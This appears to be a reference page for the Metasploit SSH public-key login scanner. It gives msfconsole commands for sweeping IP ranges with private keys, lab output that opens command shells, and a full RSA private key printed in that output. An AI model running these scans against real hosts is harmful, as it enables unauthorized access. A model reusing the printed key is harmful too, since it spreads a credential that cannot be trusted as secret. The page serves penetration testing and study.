SSH Public Key Login Scanner - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/ssh/ssh_login_pubkey metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SSH Public Key Login Scanner
Module: auxiliary/scanner/ssh/ssh_login_pubkey
Source code: modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
Disclosure date: -
Last modification time: 2021-10-22 17:24:26 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 22
List of CVEs: -
This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key, or several private keys in a single directory. Only a single passphrase is supported however, so it must either be shared between subject keys or only belong to a single one.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > show options
... show and set options ...
msf auxiliary(ssh_login_pubkey) > set RHOSTS ip-range
msf auxiliary(ssh_login_pubkey) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(ssh_login_pubkey) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(ssh_login_pubkey) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(ssh_login_pubkey) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line
level. SSH is available on most every system, including Windows, but is mainly used by *nix administrators. This
module attempts to login to SSH with username and private key combinations. For username and password logins, please
use auxiliary/scanner/ssh/ssh_login
. It should be noted that some modern Operating Systems have default
configurations to not allow the root
user to remotely login via SSH, or to only allow root
to login with an SSH key
login.
Key Generation
On most modern *nix Operating System, the ssh-keygen
command can be utilized to create an SSH key. Metasploit
expects the key to be unencrypted, so no password should be set during ssh-keygen
. After following the prompts to
create the SSH key pair, the pub
key needs to be added to the authorized_keys list. To do so simply run: cat
~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
Verification Steps
- Install SSH and start it.
- Create an SSH keypair and add the public key to the
authorized_keys
file - Start msfconsole
- Do:
use auxiliary/scanner/ssh/ssh_login_pubkey
- Do:
set rhosts
- Do: set usernames with one of the available options
- Do: set private keys with one or both of the available options
- Do:
set KEY_PATH
to either a file or path - Do:
set PRIVATE_KEY
tofile:PRIVATE_KEY_PATH
- Do:
- Do:
run
- You will hopefully see something similar to the following:
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
Session Capabilities
Like Meterpreter sessions, this newly established session can be used to pivot connections as defined by Metasploit's
routing table. For more information, see the module docs for auxiliary/scanner/ssh/ssh_login
.
Options
KEY_PATH
A string to the private key to attempt, or a folder containing private keys to attempt. Any file name starting with a
period (.
) or ending in .pub
will be ignored. An SSH key is typically kept in a user's home directory under
.ssh/id_rsa
. The file contents, when not encrypted with a password will start with -----BEGIN RSA PRIVATE KEY-----
PRIVATE_KEY
A string of the private key to attempt. For MSFConsole users the option should be set to file:PRIVATE_KEY_PATH
and it
will read in the string value of the private key. Currently OpenSSH, RSA, DSA, and ECDSA private keys are supported.
STOP_ON_SUCCESS
If a valid login is found on a host, immediately stop attempting additional logins on that host.
USERNAME
Username to try for each password.
USER_FILE
A file containing a username on every line.
VERBOSE
Show a failed login attempt. This can get rather verbose when large USER_FILE
s or KEY_PATH
s are used. A failed
attempt will look similar to the following: [-] SSH - Failed
Option Combinations
It is important to note that usernames can be entered in multiple combinations. For instance, a username could be set
in USERNAME
, and be part of USER_FILE
. This module makes a combination of all of the above when attempting logins.
So if a username is set in USERNAME
, and a USER_FILE
is listed, usernames will be generated from BOTH of these.
Similar to USERNAME
and USER_FILE
, both KEY_PATH
and PRIVATE_KEY
can be set simultaneously and all unique
combinations of these will be tested.
Scenarios
Example run with a FOLDER set for KEY_PATH
against:
- Ubuntu 14.04 Server
While the two SSH key are nearly identical, one character has been modified in one of the keys to prevent a successful login.
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.156
rhosts => 192.168.2.156
msf auxiliary(ssh_login_pubkey) > set username ubuntu
username => ubuntu
msf auxiliary(ssh_login_pubkey) > set key_path /root/sshkeys/
key_path => /root/sshkeys/
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.2.156:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 2 keys from /root/sshkeys
[-] SSH - Failed: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
aAz8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
-----END RSA PRIVATE KEY-----
'
[!] No active DB -- Credential data will not be saved!
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
0Az8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
-----END RSA PRIVATE KEY-----
' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.2.117:44179 -> 192.168.2.156:22) at 2017-02-22 22:08:11 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Similar example but run with a KEY FILE set for PRIVATE_KEY
:
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.156
rhosts => 192.168.2.156
msf auxiliary(ssh_login_pubkey) > set username ubuntu
username => ubuntu
msf auxiliary(ssh_login_pubkey) > set private_key file:/root/sshkeys/id_rsa
private_key => -----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
0Az8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
-----END RSA PRIVATE KEY-----
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.2.156:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 1 keys from
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
0Az8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
-----END RSA PRIVATE KEY-----
' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.2.117:44179 -> 192.168.2.156:22) at 2017-02-22 22:08:11 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the scanner/ssh/ssh_login_pubkey auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show info
Name: SSH Public Key Login Scanner
Module: auxiliary/scanner/ssh/ssh_login_pubkey
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
todb <[email protected]>
RageLtMan
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
KEY_PASS no Passphrase for SSH private key(s)
KEY_PATH no Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped. Duplicate private keys will be ignored.
PRIVATE_KEY no The string value of the private key that will be used. If you are using MSFConsole, this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and ECDSA private keys are supported.
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Description:
This module will test ssh logins on a range of machines using a
defined private key file, and report successful logins. If you have
loaded a database plugin and connected to a database this module
will record successful logins and hosts so you can track your
access. Key files may be a single private key, or several private
keys in a single directory. Only a single passphrase is supported
however, so it must either be shared between subject keys or only
belong to a single one.
Module Options
This is a complete list of options available in the scanner/ssh/ssh_login_pubkey auxiliary module:
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show options
Module options (auxiliary/scanner/ssh/ssh_login_pubkey):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
KEY_PASS no Passphrase for SSH private key(s)
KEY_PATH no Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped. Duplicate private keys will be ignored.
PRIVATE_KEY no The string value of the private key that will be used. If you are using MSFConsole, this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and ECDSA private keys are supported.
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Advanced Options
Here is a complete list of advanced options supported by the scanner/ssh/ssh_login_pubkey auxiliary module:
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show advanced
Module advanced options (auxiliary/scanner/ssh/ssh_login_pubkey):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
GatherProof true yes Gather proof of access via pre-session shell commands
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MaxGuessesPerService 0 no Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.
MaxGuessesPerUser 0 no Maximum guesses for a particular username for the service instance. Note that users are considered unique among different services, so a user at 10.1.1.1:22 is d
ifferent from one at 10.2.2.2:22, and both will be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number, this option will not be used.
MaxMinutesPerService 0 no Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
REMOVE_PASS_FILE false yes Automatically delete the PASS_FILE on module completion
REMOVE_USERPASS_FILE false yes Automatically delete the USERPASS_FILE on module completion
REMOVE_USER_FILE false yes Automatically delete the USER_FILE on module completion
SSH_DEBUG false no Enable SSH debugging output (Extreme verbosity!)
SSH_IDENT SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 yes SSH client identification string
SSH_KEYFILE_B64 no Raw data of an unencrypted SSH public key. This should be used by programmatic interfaces to this module only.
SSH_TIMEOUT 30 no Specify the maximum time to negotiate a SSH session
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
TRANSITION_DELAY 0 no Amount of time (in minutes) to delay before transitioning to the next user in the array (or password when PASSWORD_SPRAY=true)
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/ssh/ssh_login_pubkey module can do:
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/ssh/ssh_login_pubkey auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Files that failed to be read
Here is a relevant code snippet related to the "Files that failed to be read" error message:
130: username: datastore['USERNAME'],
131: private_key: datastore['PRIVATE_KEY']
132: )
133:
134: unless keys.valid?
135: print_error("Files that failed to be read:")
136: keys.error_list.each do |err|
137: print_line("\t- #{err}")
138: end
139: end
140:
Could not connect: <RESULT.PROOF>
Here is a relevant code snippet related to the "Could not connect: <RESULT.PROOF>" error message:
195: print_brute :level => :error, :ip => ip, :msg => msg
196: end
197: :next_user
198: when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
199: if datastore['VERBOSE']
200: print_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}"
201: end
202: scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
203: invalidate_login(credential_data)
204: :abort
205: when Metasploit::Model::Login::Status::INCORRECT
Failed: '<RESULT.CREDENTIAL>'
Here is a relevant code snippet related to the "Failed: '<RESULT.CREDENTIAL>'" error message:
202: scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
203: invalidate_login(credential_data)
204: :abort
205: when Metasploit::Model::Login::Status::INCORRECT
206: if datastore['VERBOSE']
207: print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
208: end
209: invalidate_login(credential_data)
210: scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
211: else
212: invalidate_login(credential_data)
No key path or key provided
Here is a relevant code snippet related to the "No key path or key provided" error message:
233: def valid?
234: @error_list = []
235: @key_data = Set.new
236:
237: unless @private_key.present? || @key_path.present?
238: raise RuntimeError, "No key path or key provided"
239: end
240:
241: if @key_path.present?
242: if File.directory?(@key_path)
243: @key_files ||= Dir.entries(@key_path).reject { |f| f =~ /^\x2e|\x2epub$/ }
<KEY_PATH> could not be read, <E>
Here is a relevant code snippet related to the "<KEY_PATH> could not be read, <E>" error message:
252: elsif File.file?(@key_path)
253: begin
254: data = read_key(@key_path)
255: @key_data << data if valid_key?(data)
256: rescue StandardError => e
257: @error_list << "#{@key_path} could not be read, #{e}"
258: end
259: else
260: raise RuntimeError, "Invalid key path"
261: end
262: end
Invalid key path
Here is a relevant code snippet related to the "Invalid key path" error message:
255: @key_data << data if valid_key?(data)
256: rescue StandardError => e
257: @error_list << "#{@key_path} could not be read, #{e}"
258: end
259: else
260: raise RuntimeError, "Invalid key path"
261: end
262: end
263:
264: if @private_key.present?
265: data = Net::SSH::KeyFactory.load_data_private_key(@private_key, @password, false).to_s
Invalid private key
Here is a relevant code snippet related to the "Invalid private key" error message:
264: if @private_key.present?
265: data = Net::SSH::KeyFactory.load_data_private_key(@private_key, @password, false).to_s
266: if valid_key?(data)
267: @key_data << data
268: else
269: raise RuntimeError, "Invalid private key"
270: end
271: end
272:
273: !@key_data.empty?
274: end
Go back to menu.
Related Pull Requests
- #15430 Merged Pull Request: Support for SSH pivoting
- #15359 Merged Pull Request: Fix bug 15218 authentication issue in ssh_login_pubkey
- #15014 Merged Pull Request: Added string PKey support for ssh module
- #14879 Merged Pull Request: Fix error when running ssh_login_pubkey.rb against a directory/file and improve error handling
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #13748 Merged Pull Request: off to false
- #13321 Merged Pull Request: ssh_login windows 10/2019 friendly, and 'submit unknown' banner.
- #13315 Merged Pull Request: flip gatherpoof
- #12024 Merged Pull Request: Add GatherProof advanced option to ssh_login*
- #12022 Merged Pull Request: Deregister PASSWORD_SPRAY option for LoginScanner modules
- #11340 Merged Pull Request: Add functionality to change Net::SSH's client identification string
- #11523 Merged Pull Request: MSF5: Remove unneeded RHOST deregister in scanners
- #11103 Merged Pull Request: Add CreateSession option to opt out of session creation in login modules
- #10819 Merged Pull Request: ssh_login* now populates the os_name field
- #9694 Merged Pull Request: move ssh platforms to lib
- #9614 Merged Pull Request: Juniper post enum module
- #9524 Merged Pull Request: prefer 'shell' channels over 'exec' channels for ssh CommandStream
- #9358 Merged Pull Request: Permit encrypted SSH keys for login scanner
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
Go back to menu.
See Also
Check also the following modules related to this module:
- auxiliary/scanner/ssh/ssh_enum_git_keys
- auxiliary/scanner/ssh/ssh_enumusers
- auxiliary/scanner/ssh/ssh_identify_pubkeys
- auxiliary/scanner/ssh/ssh_login
- auxiliary/scanner/ssh/ssh_version
- auxiliary/scanner/ssh/apache_karaf_command_execution
- auxiliary/scanner/ssh/cerberus_sftp_enumusers
- auxiliary/scanner/ssh/detect_kippo
- auxiliary/scanner/ssh/eaton_xpert_backdoor
- auxiliary/scanner/ssh/fortinet_backdoor
- auxiliary/scanner/ssh/juniper_backdoor
- auxiliary/scanner/ssh/karaf_login
- auxiliary/scanner/ssh/libssh_auth_bypass
- auxiliary/fuzzers/ssh/ssh_kexinit_corrupt
- auxiliary/fuzzers/ssh/ssh_version_15
- auxiliary/fuzzers/ssh/ssh_version_2
- auxiliary/fuzzers/ssh/ssh_version_corrupt
- post/multi/gather/ssh_creds
- auxiliary/dos/windows/ssh/sysax_sshd_kexchange
- auxiliary/admin/http/cisco_7937g_ssh_privesc
- exploit/dialup/multi/login/manyargs
Authors
- todb
- RageLtMan
Version
